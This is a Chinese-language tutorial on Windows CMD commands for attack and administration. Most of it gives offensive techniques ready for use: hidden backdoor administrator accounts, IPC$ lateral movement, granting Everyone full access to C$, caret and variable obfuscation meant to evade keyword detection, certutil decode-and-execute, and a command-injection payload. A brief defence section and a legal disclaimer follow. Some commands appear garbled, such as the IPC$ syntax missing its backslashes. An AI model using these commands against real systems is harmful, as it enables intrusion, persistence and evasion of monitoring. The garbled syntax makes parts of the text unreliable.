以下是针对黑客攻防及系统管理中必备的CMD命令实战指南，结合高级操作与混淆技巧进行综合整理，涵盖基础到进阶应用场景：

一、基础操作与系统信息获取

1. 系统信息探测

`systeminfo`：获取操作系统、补丁、内存等详细信息（常用于资产收集）

`ver`：查看Windows版本

`hostname`：显示计算机名称

`tasklist`：列出所有进程及其PID（配合`taskkill /PID 1234 /F`强制终止进程）

2. 网络配置与诊断

`ipconfig /all`：查看完整网络配置（包括MAC地址和DNS）

`netstat -ano`：显示所有活动的网络连接及对应进程PID

`tracert 目标IP`：追踪路由路径

`netsh interface show interface`：查看网卡状态

二、高级管理与内网渗透

1. 用户与权限管理

`net user 用户名 /add`：创建新用户

`net localgroup administrators 用户名 /add`：将用户提权至管理员组

`net user guest /active:yes`：激活Guest账户

2. 共享与远程控制

`net use 目标IPIPC$ "密码" /user:"用户名"`：建立IPC非空连接（常用于内网横向移动）

`net share C$=C: /grant:Everyone,FULL`：共享C盘并赋予完全权限

`mstsc`：启动远程桌面连接

3. 服务与计划任务

`sc start/stop 服务名`：启停系统服务

`schtasks /create /tn 任务名 /tr "命令" /sc hourly`：创建定时任务

三、命令混淆与隐蔽执行

1. 特殊字符绕过

使用`^`转义符：`c^m^d`等效于`cmd`，可绕过简单关键词检测

分号替换空格：`ping;127.0.0.1`等效于`ping 127.0.0.1`

双引号分割：`"po"^w^er"sh"ell`拼接为`powershell`

2. 环境变量拼接

截取变量值：

cmd

set a=net && set b= user && %a%%b% hacker /add

通过环境变量拼接`net user hacker /add`

利用系统变量：

cmd

%COMSPEC% /c echo 执行命令（调用cmd.exe路径）

3. 延迟执行与编码混淆

启用延迟扩展：`cmd /V:ON /C "set var=calc&& !var!"`（执行计算器）

Base64编码：

cmd

certutil -decode encoded_command.txt decoded_command.bat && decoded_command.bat

四、实战场景案例

1. 文件隐藏与数据窃取

隐藏文本到图片：

cmd

copy /b 1.jpg + secret.txt output.jpg

通过附加数据实现隐写

2. 权限维持与后门

创建隐蔽用户：

cmd

net user sysbackup Pa$$w0rd! /add /active:no

禁用账户避免被发现

3. 命令注入攻击

在Web应用漏洞中注入：

cmd

ping 127.0.0.1 && net user hacker /add

通过`&&`串联恶意命令

五、防御与对抗建议

1. 监控与检测

通过`auditpol`启用命令行日志审计

使用`Sysmon`监控可疑进程链

2. 权限最小化

限制管理员账户的远程访问权限

禁用不必要的系统服务（如`Telnet`）

3. 输入过滤与白名单

对用户输入进行严格校验（如仅允许数字和`.`）

使用API替代直接执行命令（如C的`Process.Start`参数化调用）

附：工具与资源

PowerSploit：结合CMD与PowerShell的渗透框架

Nishang：集成多种Payload的脚本工具

Sysinternals Suite：微软官方工具集，用于进程监控与分析

> 提示：以上命令需在合法授权环境中测试，滥用可能涉及法律风险。更完整的命令列表可参考的实战教程。